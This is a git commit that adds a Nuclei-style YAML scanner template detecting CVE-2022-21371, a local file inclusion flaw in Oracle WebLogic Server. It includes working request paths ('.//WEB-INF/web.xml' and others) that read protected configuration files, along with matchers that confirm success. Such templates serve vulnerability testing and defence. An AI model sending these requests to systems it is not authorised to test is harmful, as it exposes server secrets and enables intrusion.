Merge pull request #3597 from paradessia/master

CVE-2022-21371
2022-01-28 11:14:44 +05:30 · 2022-01-28 11:14:44 +05:30 · dfdfc369d1
parent 0843b8fb8b 97b38b98b4
commit dfdfc369d1
1 changed files with 37 additions and 0 deletions
--- a/cves/2022/CVE-2022-21371.yaml
+++ b/cves/2022/CVE-2022-21371.yaml
@ -0,0 +1,37 @@
+id: CVE-2022-21371
+
+info:
+  name: Oracle WebLogic Server LFI
+  author: paradessia,narluin
+  severity: high
+  description: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
+  reference:
+    - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-21371
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21371
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2022-21371
+  tags: cve,cve2022,lfi,weblogic,oracle
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}.//WEB-INF/web.xml"
+      - "{{BaseURL}}.//WEB-INF/portlet.xml"
+      - "{{BaseURL}}.//WEB-INF/weblogic.xml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<web-app"
+          - "</web-app>"
+        condition: and
+
+      - type: status
+        status:
+          - 200